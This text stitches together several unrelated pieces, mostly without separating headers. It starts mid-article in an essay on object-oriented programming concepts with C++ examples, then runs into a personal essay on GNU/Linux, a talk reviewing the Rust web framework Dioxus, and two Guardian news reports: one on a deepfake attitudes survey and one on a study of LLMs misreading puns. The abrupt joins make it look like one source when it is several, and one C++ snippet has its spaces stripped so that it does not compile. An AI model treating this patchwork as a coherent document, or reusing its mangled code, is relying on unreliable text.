Interfaces are often considered a simpler, more disciplined alternative to full-blown class inheritance. They are a single-purpose feature and don’t suffer from the diamond problem that plagues multiple inheritance.
Interfaces are also extremely useful in combination with
parametric polymorphism
, since they allow you to constrain the operations a type parameter must support. Dynamically typed languages (and C++/D templates) achieve something similar through
duck-typing
, but even languages with duck-typing introduce interface constructs later to express constraints more explicitly (e.g., C++ concepts or TypeScript interfaces).
Interfaces as implemented in OOP languages often have a runtime cost, but that’s not always the case. For example, C++ concepts are checked purely at compile time, and Rust traits only opt into runtime polymorphism via dyn.
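As a small sketch of the zero-runtime-cost case, a C++ concept can act as a purely compile-time "interface" (the Named concept and the Cat type here are invented for this example):

#include <concepts>
#include <iostream>
#include <string>

// A compile-time "interface": any type with a const name() returning something
// convertible to std::string satisfies it, with no vtable or heap allocation.
template <typename T>
concept Named = requires(const T& t) {
    { t.name() } -> std::convertible_to<std::string>;
};

struct Cat {
    std::string name() const { return "Kitty"; }
};

void print_name(const Named auto& x) { std::cout << x.name() << '\n'; }

int main() { print_name(Cat{}); }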
Late Binding
OOP to me means only messaging, local retention and protection and hiding of state-process, and extreme late-binding of all things —
Alan Kay
Late binding refers to delaying the lookup of a method or a member until runtime. It is the default in most dynamically typed languages, where method calls are often implemented as a hash-table lookup, but it can also be achieved by other means, such as dynamic loading or function pointers.
A key aspect of late binding is that behaviour can be changed while the software is still running, enabling all kinds of hot-reloading and monkey-patching workflows.
The downside of late binding is its non-trivial performance cost. It can also be a footgun, making it easier to break invariants or run into interface mismatches. Its mutable nature can introduce subtler issues as well, for example the “late binding closures” pitfall in Python.
A concept related to late binding is dynamic dispatch, in which the implementation of a polymorphic operation is selected at runtime. The two concepts overlap, though dynamic dispatch focuses more on selecting multiple known polymorphic operations rather than on name lookup.
In a dynamically typed language, dynamic dispatch is the default since everything is late-bound. In statically typed languages, it is usually implemented as a virtual function table that looks something like this under the hood:
struct BaseClass;  // forward declaration so the function pointers can refer to it

struct VTable {
    // function pointer to destroy the object
    void (*destroy)(BaseClass&);
    // function pointer to one method implementation
    void (*foo)();
    // function pointer to another method implementation
    int (*bar)(int);
};

struct BaseClass {
    VTable* vtable;
};
These languages also provide compile-time guarantees that the vtable contains valid operations for the type.
Dynamic dispatch can be decoupled from inheritance, whether by manually implementing a v-table (e.g., C++’s “type-erased types” such as std::function) or via interface/trait/typeclass constructs. When not paired with inheritance, dynamic dispatch alone is usually not considered “OOP.”
Another thing to note is that the pointer to the v-table can be directly inside the object (e.g., C++) or embedded in “fat pointers” (e.g., Go and Rust).
programming using class hierarchies and virtual functions to allow manipulation of objects of a variety of types through well-defined interfaces and to allow a program to be extended incrementally through derivation —
Bjarne Stroustrup
Inheritance has a long history, dating back to
Simula 67
. It is probably the most iconic feature of OOP. Almost every language marketed as “object-oriented” includes it, while languages that avoid OOP typically omit it.
It can be damn
convenient
. In many cases, using an alternative approach will result in significantly more boilerplate.
On the other hand, inheritance is a very
non-orthogonal
feature. It is a single mechanism that enables dynamic dispatch, subtyping polymorphism, interface/implementation segregation, and code reuse. It is flexible, though that flexibility makes it easy to misuse. For that reason, some languages nowadays replace it with more restrictive alternative constructs.
There are some other problems with inheritance. First, using inheritance almost certainly means you are paying the performance cost of dynamic dispatch and heap allocation. In some languages, such as C++, you can use inheritance without dynamic dispatch and heap allocation, and there are some valid use cases (e.g., code reuse with
CRTP
), but the majority of uses of inheritance are for runtime polymorphism (and thus rely on dynamic dispatch).
Second, inheritance implements subtyping in an unsound way, requiring programmers to manually enforce the
Liskov substitution principle
.
Finally, inheritance hierarchies are rigid. They suffer from issues like the diamond problem, and that inflexibility is one of the main reasons people prefer composition over inheritance. The
component pattern chapter of Game Programming Patterns
provides a good example.
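To make the CRTP aside above concrete, here is a minimal sketch of inheritance used purely for compile-time code reuse, with no virtual calls or heap allocation (the Printable/Point names are invented for this example):

#include <iostream>
#include <string>

// CRTP: the base template knows the derived type at compile time, so shared
// behaviour is reused without dynamic dispatch.
template <typename Derived>
struct Printable {
    void print() const {
        // Static downcast, resolved at compile time; no vtable involved.
        std::cout << static_cast<const Derived&>(*this).to_string() << '\n';
    }
};

struct Point : Printable<Point> {
    int x = 0, y = 0;
    std::string to_string() const {
        return "(" + std::to_string(x) + ", " + std::to_string(y) + ")";
    }
};

int main() {
    Point p;
    p.x = 1;
    p.y = 2;
    p.print();  // prints (1, 2)
}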
Subtyping Polymorphism
If for each object o1 of type S there is another object o2 of type T such that for all programs P defined in terms of T, the behavior of P is unchanged when o1 is substituted for o2, then S is a subtype of T. — Barbara Liskov, “Data Abstraction and Hierarchy”
Subtyping describes an “is a” relation between two types. The
Liskov substitution principle
defines the property that safe subtyping relationships must uphold.
OOP languages often support subtyping via inheritance, but note that inheritance doesn’t always model subtyping, and it is not the only form of subtyping either. Various interface/trait constructs in non-OOP languages often support subtyping. And besides
nominal subtyping
, where one explicitly declares the subtyping relationship, there is also
structural subtyping
, where the subtyping is implicit if one type contains all the features of another type. Good examples of structural subtyping include OCaml (
objects
and polymorphic variants) and TypeScript interfaces. Subtyping also shows up in all kinds of little places, such as Rust lifetimes and TypeScript’s coercion from a non-nullable type to its nullable counterpart.
A related concept to subtyping is
variance
(not related to class invariants), which bridges parametric polymorphism and subtyping. I won’t bother explaining variance here, as this topic probably needs an entire blog post to explain well. It is a great ergonomic boost (e.g., C++ pointers would be unusable for polymorphic use if they were not covariant), but most languages only implement a limited, hard-coded version, because it is hard to understand and error-prone. In particular, mutable data types usually should be invariant, and Java/C#’s covariant arrays are a prime example of getting this wrong. A few languages let programmers control variance explicitly, including
Scala
and
Kotlin
.
Type conversion via subtyping relationships is often implicit. Implicit conversion has a bad reputation, though doing it via subtyping is ergonomic and is probably the least surprising kind of implicit conversion. Another way to view subtyping is as the dual of implicit conversion: we can “fake” a subtyping relation with an implicit conversion. For example, C++ templated types are invariant, but
std::unique_ptr
achieves covariance with an implicit conversion from
std::unique_ptr<Derived>
to
std::unique_ptr<Base>
.
Does Go Have Subtyping?
is a good article to further explore this idea.
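A quick sketch of the std::unique_ptr example from above:

#include <memory>
#include <utility>

struct Base { virtual ~Base() = default; };
struct Derived : Base {};

int main() {
    // std::unique_ptr is an invariant class template, but its converting
    // constructor from unique_ptr<Derived> gives covariance in practice.
    std::unique_ptr<Derived> d = std::make_unique<Derived>();
    std::unique_ptr<Base> b = std::move(d);  // "subtyping" faked by an implicit conversion
}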
One reason that language designers often try to avoid subtyping is the implementation complexity. Integrating bidirectional type inference and subtyping is notoriously difficult. Stephen Dolan’s 2016 thesis
Algebraic Subtyping
makes good progress addressing this issue.
Message Passing
I thought of objects being like biological cells and/or individual computers on a network, only able to communicate with messages —
Alan Kay
Message passing means organizing execution around objects that send each other “messages”. It is the central theme of Alan Kay’s vision of OOP, though the definition can be pretty vague. An important point is that message names are late-bound, and the structures of these messages are not necessarily fixed at compile time.
Many early object-oriented concepts were influenced by distributed and simulation systems, where message passing is natural. However, in the era when most people worked on single-threaded code, message passing was gradually forgotten in languages such as C++ and Java. The method syntax captures only a limited part of the original message-passing idea (Bjarne Stroustrup was certainly aware of the idea from Simula, but there were practical constraints on making it fast). There was still some genuine message passing, but only in specific areas such as inter-process communication or highly event-driven systems.
Message passing has seen a renaissance in concurrent programming, ironically through non-OOP languages like Erlang and Golang, with constructs such as actors and channels. This kind of
shared-nothing concurrency
removed a whole range of data race and race condition bugs. In combination with supervision, actors also provide fault tolerance, so that the failure of one actor will not affect the entire program.
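Since this article's other examples are C++, here is a hedged sketch of the channel idea in that language (the Channel class is invented for illustration; real actor/channel libraries add supervision, backpressure, select, and so on):

#include <condition_variable>
#include <iostream>
#include <mutex>
#include <queue>
#include <string>
#include <thread>

// A minimal blocking channel: threads share nothing except the channel itself
// and communicate only by sending messages through it.
template <typename T>
class Channel {
public:
    void send(T msg) {
        {
            std::lock_guard lock(m_);
            q_.push(std::move(msg));
        }
        cv_.notify_one();
    }

    T receive() {
        std::unique_lock lock(m_);
        cv_.wait(lock, [&] { return !q_.empty(); });
        T msg = std::move(q_.front());
        q_.pop();
        return msg;
    }

private:
    std::mutex m_;
    std::condition_variable cv_;
    std::queue<T> q_;
};

int main() {
    Channel<std::string> ch;
    std::jthread worker([&ch] { ch.send("hello from the worker"); });
    std::cout << ch.receive() << '\n';
}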
Open-recursion
Originating in the famous
Types and Programming Languages
,
open recursion
is probably the least well-known and understood term in this blog post. Nevertheless, it just describes a familiar property of object-oriented systems: methods for an object can call each other, even if they are defined in different classes in the inheritance hierarchy.
The term is somewhat misleading, as there may not be recursive function calls, but here “recursion” means “mutually recursive.” The word “open” refers to “open to extension,” typically empowered by inheritance.
It’s easiest to see with an example:
#include <print>
#include <string>

struct Animal {
    void print_name() const {
        // Note that we call `name` here, although it is not defined in Animal
        std::print("{}\n", name());
    }

    virtual std::string name() const = 0;
};

struct Cat : Animal {
    std::string name() const override {
        return "Kitty";
    }
};

int main() {
    Cat cat;
    // note we call print_name here, although it is not defined in Cat
    cat.print_name();
}
For anyone with some familiarity with OOP, we probably take open recursion for granted, even though we may not be aware of its name. But not all language constructs have this property. For example, in many languages, functions are not mutually recursive by default:
// This won't compile in C++ because `name` is not defined
voidprint_name(constAnimal&animal) {
returnname(animal);
}
std::stringname(constCat&cat) {
return"Kitty";
}
Now, in languages with late-bound functions, functions in the same module can always call each other (e.g., Python, JavaScript). There are other languages where functions are mutually recursive by default (e.g., Rust), or have forward declarations (C) or a
letrec
construct (Scheme and ML family) to make functions mutually recursive. This solves the “recursion” part, but still not the “open” part yet:
std::string name(const Cat& cat);

void print_name(const Animal& animal) {
    // This still won’t compile because we can’t downcast an Animal to a Cat
    return name(animal);
}

std::string name(const Cat& cat) {
    return "Kitty";
}
Let’s fix this problem by using a callback:
#include <functional>
#include <print>
#include <string>

struct Animal {
    std::function<std::string()> get_name;

    void print_name() const {
        std::print("{}\n", get_name());
    }
};

Animal make_cat() {
    return Animal{
        .get_name = []() { return "Kitty"; },
    };
}

int main() {
    Animal cat = make_cat();
    cat.print_name();
}
Tada, we just reinvented prototype-style dispatch!
Anyway, with my quick example above, I want to show that open recursion is a property that OOP gives for free, but reproducing it in languages without built-in support can be tricky. Open recursion allows interdependent parts of an object to be defined separately, and this property is used in many instances, for example, the entire idea of
decorator pattern
depends on open recursion.
OOP Best Practices
Perhaps the more common complaints about OOP are not about specific language features, but rather about the programming styles it encourages. Many practices are taught as universal best practices, sometimes with rationales, but their downsides are often omitted. Some examples that come to mind:
Practice: preferring polymorphism over tagged unions/if/switch/pattern matching.
Advantages: open to extension; easier to add new cases.
Disadvantages: performance hit; related behaviors get scattered across multiple places; harder to see the whole control flow in one place.

Practice: making all data members private.
Advantages: protects class invariants.
Disadvantages: more boilerplate; often unnecessary to hide data without invariants; getter/setter pairs work less well than direct access in languages without property syntax.

Practice: preferring small “self-managed” objects over central “managers”.
Advantages: harder to violate invariants; cleaner code organization.
Disadvantages: potentially bad data locality, missed parallelism opportunities, and duplicated references to common data (“back pointers”).

Practice: keeping existing code closed to modification (the open-closed principle).
Advantages: prevents new features from breaking old ones; prevents API breaks.
Disadvantages: no reason to “close” a non-public module whose usage you own; leads to unnecessary complexity and inheritance chains; poorly designed interfaces never get fixed; can cause abstraction inversion.

Practice: preferring abstraction over concrete implementations.
Advantages: makes more of the system swappable and testable.
Disadvantages: overuse sacrifices readability and debuggability; performance cost of extra indirection.
This blog post is long enough, so I will not go into more details. Feel free to disagree with my “advantages and disadvantages”. What I want to convey is that almost all those practices come with trade-offs.
In the End
Congratulations on making it to the end of this article! There are other topics I’d love to discuss, such as
RAII
and design patterns. However, this article is long enough, so I will leave those for you to explore on your own.
I know, this title might come as a surprise to many. Or perhaps, for those who truly know me, it won’t. I am not a fanboy. The BSDs and the illumos distributions generally follow an approach to design and development that aligns more closely with the way I think, not to mention the wonderful communities around them, but that does not mean I do not use and appreciate other solutions. I usually publish articles about how much I love the BSDs or illumos distributions, but today I want to talk about Linux (or, better, GNU/Linux) and why, despite everything, it still holds a place in my heart. This will be the first in a series of articles where I’ll discuss other operating systems.
Where It All Began
I started right here
, with GNU/Linux, back in 1996. It was my first real prompt after the Commodore 64 and DOS. It was my first step toward Unix systems, and it was love at first shell. I felt a sense of freedom - a freedom that the operating systems I had known up to that point (few, to be honest) had never given me. It was like a “blank sheet” (or rather, a black one) with a prompt on it. I understood immediately that this prompt, thanks to command chaining, pipes, and all the marvels of Unix and Unix-like systems, would allow me to do anything. And that sense of freedom is what makes me love Unix systems to this day.
I was young, but my intuition was correct. And even though I couldn't afford to keep a full Linux installation on that computer long-term due to hardware limitations, I realized that this would be my future. A year later, a new computer arrived, allowing me to use Linux daily, for everything. And successfully, without missing Windows at all (except for a small partition, strictly for gaming).
When I arrived at university, in 1998, I was one of the few who knew it. One of the few who appreciated it. One of the few who hoped to see a flourishing future for it. Everywhere. Widespread. A dream come true. I was a speaker at Linux Days, I actively participated in translation projects, and I wrote articles for Italian magazines. I was a purist regarding the "GNU/Linux" nomenclature because I felt it was wrong to ignore the GNU part - it was fundamental. Because
perhaps the "Year of the Linux Desktop" never arrived
, but Linux is now everywhere. On my desktop, without a doubt. But also on my smartphone (Android) and on those of hundreds of millions of people. Just as it is in my car. And in countless devices surrounding us - even if we don’t know it. And this is the true success. Let’s not focus too much on the complaint that "it’s not compatible with my device X". It is your device that is not compatible with Linux, not the other way around. Just like when, many years ago, people complained that their WinModems (modems that offloaded all processing to obscure, closed-source Windows drivers) didn't work on Linux. For "early adopters" like me, this concept has always been present, even though, fortunately, things have improved exponentially.
Linux was what companies accepted most willingly (not totally, but still...): the ongoing lawsuits against the BSDs hampered their spread, and Linux seemed like that "breath of fresh air" the world needed.
Linux and its distributions (especially those untethered from corporations, like Debian, Gentoo, Arch, etc.) allowed us to replicate expensive "commercial" setups at a fraction of the cost. Reliability was good, updating was simple, and there was a certain consistency. Not as marked as that of the BSDs, but sufficient.
The world was ready to accept it, albeit reluctantly. Linus Torvalds, despite his sometimes harsh and undiplomatic tone, carried forward the kernel development with continuity and coherence, making difficult decisions but always in line with the project. The "move fast and break things" model was almost necessary because there was still so much to build. I also remember the era when Linux - speaking of the kernel - was designed almost exclusively for x86. The other architectures, to simplify, worked thanks to a series of adaptations that brought most behavior back to what was expected for x86.
And the distributions, especially the more "arduous" ones to install, taught me a lot. The distro-hopping of the early 2000s made me truly understand partitioning, the boot procedure (Lilo first, then Grub, etc.), and for this, I must mainly thank Gentoo and Arch (and the FreeBSD handbook - but this is for another article). I learned the importance of backups the hard way, and I keep this lesson well in mind today. My Linux desktops ran mainly with Debian (initially), then Gentoo, Arch, and openSUSE (which, at the time, was still called "SUSE Linux"), Manjaro, etc. My old 486sx 25Mhz with 4MB (yes, MB) of RAM, powered by Debian, allowed me to download emails (mutt and fetchmail), news (inn + suck), program in C, and create shell scripts - at the end of the 90s.
When Linux Conquered the World
Then the first Ubuntu was launched, and many things changed. I don't know if it was thanks to Ubuntu or simply because the time was ripe, but attention shifted to Linux on the desktop as well (albeit mainly on the computers of us enthusiasts), and many companies began to contribute actively to the system or distributions.
I am not against the participation of large companies in Open Source. Their contributions can be valuable for the development of Open Source itself, and if companies make money from it, good for them. If this ultimately leads to a more complete and valid Open Source product, then I welcome it! It is precisely thanks to mass adoption that Linux cleared the path for the acceptance of Open Source at all levels. I still remember when, just after graduating, I was told that Linux (and Open Source systems like the BSDs) were "toys for universities". I dare anyone to say that today!
But this must be done correctly: without spoiling the original idea of the project and without hijacking (voluntarily or not) development toward a different model. Toward a different evolution. The use of Open Source must not become a vehicle for a business model that tends to close, trap, or cage the user. Or harm anyone. And if it is oriented toward worsening the product solely for one's own gain, I can only be against it.
What Changed Along the Way
And this is where, unfortunately, I believe things have changed in the Linux world (if not in the kernel itself, at least in many distributions). Innovation used to be disruptive out of necessity. Today, in many cases, disruption happens without purpose, and stability is often sacrificed for changes that do not solve real problems. Sometimes, in the name of improved security or stability, a new, immature, and unstable product is created - effectively worsening the status quo.
To give an example, I am not against systemd on principle, but I consider it a tool distant from the original Unix principles - do one thing and do it well - full of features and functions that, frankly, I often do not need. I don't want systemd managing my containerization. For restarting stopped services? There are monit and supervisor - efficient, effective, and optional. And, I might add: services shouldn't crash; they should handle problems in a non-destructive way. My Raspberry Pi A+ doesn't need systemd, which occupies a huge amount of RAM (and precious clock cycles) for features that will never be useful or necessary on that platform.
But "move fast and break things" has arrived everywhere, and software is often written by gluing together unstable libraries or those laden with system vulnerabilities. Not to mention so-called "vibe coding" - which might give acceptable results at certain levels, but should not be used when security and confidentiality become primary necessities or, at least, without an understanding of what has been written.
We are losing much of the Unix philosophy, and many Linux distributions are now taking the path of distancing themselves from a concept of cross-compatibility ("if it works on Linux, I don't care about other operating systems"), of minimalism, of "do one thing and do it well". And, in my opinion, we are therefore losing many of the hallmarks that have distinguished its behavior over the years.
In my view, this depends on two factors: a development model linked to a concept of "disposable" electronics, applied even to software, and the pressure from some companies to push development where they want, not where the project should go. Therefore, in certain cases, the GPL becomes a double-edged sword: on one hand, it protects the software and ensures that contributions remain available. On the other, it risks creating a situation where the most "influential" player can totally direct development because - unable to close their product - they have an interest in the entire project going in the direction they have predisposed. In these cases, perhaps, BSD licenses actually protect the software itself more effectively. Because companies can take and use without an obligation to contribute. If they do, it is because they want to, as in the virtuous case of Netflix with FreeBSD. And this, while it may remove (sometimes precious) contributions to the operating system, guarantees that the steering wheel remains firmly in the hands of those in charge - whether foundations, groups, or individuals.
And Why I Still Care
And so yes, despite all this, I (still) love Linux.
Because it was the first Open Source project I truly believed in (and which truly succeeded), because it works, and because the entire world has developed around it. Because it is a platform on which tons of distributions have been built (and some, like Alpine Linux, still maintain that sense of minimalism that I consider correct for an operating system). Because it has distributions like openSUSE (and many others) that work immediately and without problems on my laptop (suspension and hibernation included) and on my miniPC, a fantastic tool I use daily. Because hardware support has improved immensely, and it is now rare to find incompatible hardware.
Because it has been my life companion for 30 years and has contributed significantly to putting food on the table and letting me sleep soundly. Because it allowed me to study without spending insane amounts on licenses or manuals. Because it taught me, first, to think outside the box. To be free.
So thank you, GNU/Linux.
Even if your btrfs, after almost 18 years, still eats data in spectacular fashion. Even if you rename my network interfaces after a reboot. Even though, at times, I get the feeling that you’re slowly turning into what you once wanted to defeat.
Even if you are not my first choice for many workloads, I foresee spending a lot of time with you for at least the next 30 years.
To cover any upcoming legal fees just in case Nintendo doesn’t buy that
origin story, Dioxus is, as of the summer of 2023, a YCombinator startup.
Regulars might be wondering at this point, what does any of that have to do with
Rust? Well, don’t worry, I have gone and checked for you: Dioxus
is
, in fact,
getting money from Huawei, which makes it a Rust project just like any other.
Please find on this diagram, in red, every Rust project funded by Huawei,
or any other kind of -wei.
Dioxus is the promise of having a single code base for your mobile apps and web apps and desktop apps. It makes me think of React Native or PhoneGap. If you’ve heard of PhoneGap, remember to stretch. It’s very important at our ages.
Dioxus “fullstack” goes one step further, with a single code base for the client and for the server. But what does that mean? How did we get here? Let’s go back in time for a minute or twelve.
There’s been plenty of different paradigms when it comes to web apps, and I
won’t cover them all.
In short, in the first generation, “generating HTML” is the job of the server. You
are allowed to sprinkle some JavaScript (or, god forbid, Visual Basic Script) to
make some stuff move, but that’s as far as it goes.
Note that I’m saying “render” in that diagram for “generating HTML”, with my apologies to people who work on Servo and Skia and whatnot. I’m just reusing the React nomenclature, sowwy.
In the second generation of web apps, the world has now written a critical mass of JavaScript. We’re starting to have something that resembles DevTools. If you remember Firebug, that was among the first. And maybe you should work on a will or something like that.
We’re starting to get comfortable with the idea of a real application living
inside of the web browser, which renders HTML based on structured data coming
from the server. And then follows a decade of developers using something called
“XMLHttpRequest” to send JSON around. Oh well.
We’re starting to have web apps that work offline. However, the initial loading
experience is bad. Visitors have to wait for the entire app to load,
then they wait for the app to do its API calls, and then for the app to render the
HTML, which can take a long time: planet earth is starting to develop a
collective distaste for the spinner.
And that’s not the only problem we’ll have to address for SPAs (single-page
apps). We’ll have accessibility, navigation history, search engine optimization,
and of course, data loading. If every component on a page does its own API
request to get some data and then render, that’s a lot of requests per page.
Especially if you looked at React the wrong way and your component is doing API
calls in an infinite loop, then it’s a lot, a lot, a lot of API calls. And yes,
that is actually what took Cloudflare down
recently.
So boom, third generation, full stack, best of both worlds. We do the render on
the server like before, and we stream it to the client, which can display it as
it’s being received. But alongside that rendered HTML, the server also sends the
structured data that it used to render the HTML.
Here’s a practical example. It’s a counter written in Dioxus:
#[component]
fn Counter() -> Element {
    let mut x = use_signal(|| 0_u64);
    let inc = move |_| x += 1;
    let dec = move |_| x -= 1;

    rsx! {
        "{x}"
        button { onclick: inc, "+" }
        button { onclick: dec, "-" }
    }
}
When we do the server-side rendering, we just say: okay, there is a variable x that starts at zero. It’s used in the rsx! macro, and then there are two buttons. The two buttons do something if you click on them, but can we do something about it on the server side? No, those event handlers have to be registered on the client side. All we can do is send hints.
There’s no onclick attribute on the button tags directly. There’s only information that references the structured data (that I’m not showing you here to avoid a wall of text).
So the client has the same data the server had. It’s doing the same render as
the server did and then it creates a mapping between what the server sent and
what the client rendered. Then it takes over the document, installing event
handlers, making everything interactive, a process we call hydration.
Now the whole point of having the server stream markup is that we can show it
early before the app is even loaded on the client. But what happens if we click
on a button in the middle of the hydration process?
In theory, the server markup could include actual links or forms that would
trigger regular browser actions. But in practice, it’s been a while since I’ve
seen anybody bother doing that.
Now, what happens if during hydration the client render doesn’t match the server render? Then it can’t create a mapping and everything’s broken. I think the best you can do here is just replace everything with the version that the client rendered, which is still pretty bad as everything would jump around.
And now what if we need data that takes some time to fetch? For example, we’re
fetching from a database or an API. That’s a family of problems that the
industry has been trying to solve for years. And Dioxus offers several solutions
in the form of hooks:
try_use_context
use_after_suspense_resolved
use_callback
use_context
use_context_provider
use_coroutine
use_coroutine_handle
use_effect
use_future
use_hook
use_hook_did_run
use_hook_with_cleanup
use_route
use_router
use_navigator
use_memo
use_on_unmount
use_reactive
use_resource
use_root_context
use_set_compare
use_set_compare_equal
use_signal
use_signal_sync
use_reactive!
use_server_future
use_server_cached
use_drop
use_before_render
use_after_render
So there’s a little something for everyone. There’s synchronous hooks. There’s
asynchronous hooks. There’s reactive hooks. There’s hooks that cache the
results. There are hooks that only run on the server side or only on the client
side.
It’s a little bit intimidating, to be honest. We’re far from the “if it compiles, it works” feeling I got used to in Rust.
If you break the rules of hooks, you don’t get a build error or even a runtime
error. You just get a weird behavior, which can be hard to debug.
But there’s kind of a good reason for that.
It’s that full stack stuff is complicated. It truly is. It’s not that Dioxus
added complexity where we didn’t need any. It’s that this is a problem that’s
inherently complex.
But as I dug deeper, I realized that most of my complaints were really just
misunderstandings, or already in the process of being fixed in the main branch,
or simply limitations of the current WebAssembly/Rust ecosystem.
I was going to start with praising the developer experience of Dioxus with their dx tool, which wraps cargo and takes care of compiling WebAssembly.
I was going to praise the loading screen you see in the browser while it’s
compiling everything…
But then I was going to complain about the fact that if there’s a panic in the
app, it just becomes unresponsive! There is nothing that shows you that
something went wrong and the entire app is broken!
Well, in the main branch, there is! Of course they added it! It makes sense, and
they are smart people using their own stuff.
Next, I was going to complain that the stack traces are completely useless
because all we see are function names with numbers and hexadecimal offsets into
a big WASM file.
But since then, I’ve found this Chrome extension called C/C++ DevTools Support (DWARF), which looks exactly like what someone would come up with if they were trying to target me specifically with malware.
And yet it works. It doesn’t actually give us the names of the functions, but it does show the names of source files and line numbers. And if you click them, they open up in DevTools, and you can place breakpoints, step in, step over, and step out like a real debugger.
It’s honestly a lot better than I imagined. I didn’t even know we were so far
with WASM debugging or that we had picked DWARF for that but I guess that makes
sense.
Next, I was going to complain about Subsecond, their hot patching thing.
So, what is hot patching? When you develop a web application, it’s kind of a given now, because of React and Svelte and whatnot, that you should be able to modify the source code that corresponds to a component and that, when you save that file in your editor, the change should apply directly in your browser without changing the state of the application.
So if you’ve navigated deep into your application’s hierarchy, hot patching
doesn’t reload you back to the start page. It doesn’t reload the page at all.
Instead, it updates only the components that have changed on the current page.
And I thought I was using that with Dioxus, and I thought: wow, it doesn’t really work well at all. It actually does lose state and it’s not actually under a second. It turns out I hadn’t enabled it. I forgot. You have to pass --hot-patch and I… didn’t know.
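For context, a minimal sketch of how that flag gets passed, assuming the usual dx dev-server workflow (the exact subcommand may differ between Dioxus versions):

$ dx serve --hot-patch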
When I did enable it, I noticed that it worked really well. Well, it crashes all the time, because what it’s doing is a lot more complicated than what the JavaScript frameworks do, and it’s still early days. But the promise is there. You can make a change and see the result very quickly in your browser.
And you wanna know something funny? When you enable hot patching, stack traces show the actual mangled names of Rust functions. But it also breaks DWARF debugging, so uhhh… your choice, I guess.
It’s time to answer the question, does Dioxus spark joy? I’m gonna say: not yet.
For now, without subsecond and everything, it’s still really unpleasant for the
most part, compared to Svelte 5 which is my gold standard. But I can see what
the Dioxus team is going for and I’m really excited for it.
I was kind of skeptical going into this. I was like: I’m gonna get Rust enums, which is great, but everything else is going to suck.
But I was wrong! The generational references make event handlers not actually miserable to write. Server-side functions with WebSockets actually work pretty well, and they get rid of a lot of boilerplate.
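As a rough illustration of what a server function looks like, here is a minimal sketch using Dioxus’s #[server] attribute; the function name and body are made up for the example, and the exact setup may vary between Dioxus versions:

use dioxus::prelude::*; // assumes the "fullstack" feature is enabled

// The body compiles into the server binary only; the WASM build gets a
// generated stub that calls it over the network.
#[server]
async fn double(value: i64) -> Result<i64, ServerFnError> {
    Ok(value * 2)
}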
The Dioxus team is doing a lot of hard, interesting work. They have a Flexbox implementation that they’re sharing with Servo.
They’re doing their own HTML and CSS renderer now to make desktop applications
without a full-fledged web engine.
I’m very much looking forward to Dioxus and the entire WASM-on-the-frontend ecosystem catching up with the JavaScript-based solutions in terms of developer ergonomics.
In the meantime, I’ll be doing Rust on the backend, and TypeScript on the
frontend.
So, since I gave this talk, I’ve written several thousand lines of Dioxus for an upcoming project, which… made the conclusion a lie, I guess. I still feel conflicted about it, but I guess I’m also invested in it now. Let’s… see where this goes!
One in four unconcerned by sexual deepfakes created without consent, survey finds
Guardian
www.theguardian.com
2025-11-24 09:00:32
One in four people think there is nothing wrong with creating and sharing sexual deepfakes, or they feel neutral about it, even when the person depicted has not consented, according to a police-commissioned survey.
The findings prompted a senior police officer to warn that the use of AI is accelerating an epidemic in violence against women and girls (VAWG), and that technology companies are complicit in this abuse.
The survey of 1,700 people commissioned by the office of the police chief scientific adviser found 13% felt there was nothing wrong with creating and sharing sexual or intimate deepfakes – digitally altered content made using AI without consent.
A further 12% felt neutral about the moral and legal acceptability of making and sharing such deepfakes.
Det Ch Supt Claire Hammond, from the national centre for VAWG and public protection, reminded the public that “sharing intimate images of someone without their consent, whether they are real images or not, is deeply violating”.
Commenting on the survey findings, she said: “The rise of AI technology is accelerating the epidemic of violence against women and girls across the world. Technology companies are complicit in this abuse and have made creating and sharing abusive material as simple as clicking a button, and they have to act now to stop it.”
She urged victims of deepfakes to report any images to the police. Hammond said: “This is a serious crime, and we will support you. No one should suffer in silence or shame.”
Creating non-consensual sexually explicit deepfakes is a criminal offence under the new Data Act.
The report, by the crime and justice consultancy Crest Advisory, found that 7% of respondents had been depicted in a sexual or intimate deepfake. Of these, only 51% had reported it to the police. Among those who told no one, the most commonly cited reasons were embarrassment and uncertainty that the offence would be treated seriously.
The data also suggested that men under 45 were likely to find it acceptable to create and share deepfakes. This group was also more likely to view pornography online and agree with misogynistic views, and feel positively towards AI. But the report said this association of age and gender with such views was weak and it called for further research to explore this apparent association.
One in 20 of the respondents admitted they had created deepfakes in the past. More than one in 10 said they would create one in the future. And two-thirds of respondents said they had seen, or might have seen, a deepfake.
The report’s author, Callyane Desroches, head of policy and strategy at Crest Advisory, warned that the creation of deepfakes was “becoming increasingly normalised as the technology to make them becomes cheaper and more accessible”.
She added: “While some deepfake content may seem harmless, the vast majority of video content is sexualised – and women are overwhelmingly the targets.
“We are deeply concerned about what our research has highlighted – that there is a cohort of young men who actively watch pornography and hold views that align with misogyny who see no harm in viewing, creating and sharing sexual deepfakes of people without their consent.”
Cally Jane Beech, an activist who campaigns for better protection for victims of deepfake abuse, said: “We live in very worrying times, the futures of our daughters (and sons) are at stake if we don’t start to take decisive action in the digital space soon.”
She added: “We are looking at a whole generation of kids who grew up with no safeguards, laws or rules in place about this, and are now seeing the dark ripple effect of that freedom.
“Stopping this starts at home. Education and open conversation need to be reinforced every day if we ever stand a chance of stamping this out.”
Can’t tech a joke: AI does not understand puns, study finds
Guardian
www.theguardian.com
2025-11-24 07:59:34
Researchers say results underline large language models’ poor grasp of humour, empathy and cultural nuance Comedians who rely on clever wordplay and writers of witty headlines can rest a little easier, for the moment at least, research on AI suggests. Experts from universities in the UK and Italy ha...
An example they tested was: “I used to be a comedian, but my life became a joke.” If they replaced this with: “I used to be a comedian, but my life became chaotic,” LLMs still tended to perceive the presence of a pun.
They also tried: “Long fairy tales have a tendency to dragon.” If they replaced “dragon” with the synonym “prolong” or even a random word, LLMs seemed to believe there was a pun there.
Prof Jose Camacho Collados, of Cardiff University’s school of computer science and informatics, claimed the research suggested LLMs’ grasp of humour was fragile.
“In general, LLMs tend to memorise what they have learned in their training. As such, they catch existing puns well but that doesn’t mean they truly understand them,” he said.
“We were able to consistently fool LLMs by modifying existing puns, removing the double meaning that made the original pun. In these cases, models associate these sentences with previous puns, and make up all sort of reasons to justify they are a pun. Ultimately, we found their understanding of puns is an illusion.”
The team concluded that when faced with unfamiliar wordplay, the LLMs’ success rate in distinguishing puns from sentences without a pun can drop to 20%.
Another pun tested was: “Old LLMs never die, they just lose their attention.” When attention was changed to “ukulele”, the LLM still perceived it as a pun on the basis that “ukulele” sounded a bit like “you-kill-LLM”.
The team was surprised at the creativity, but still, the LLM had not got the joke.
The researchers said the work underlined why people should be cautious when using LLMs for applications that need an understanding of humour, empathy or cultural nuance.
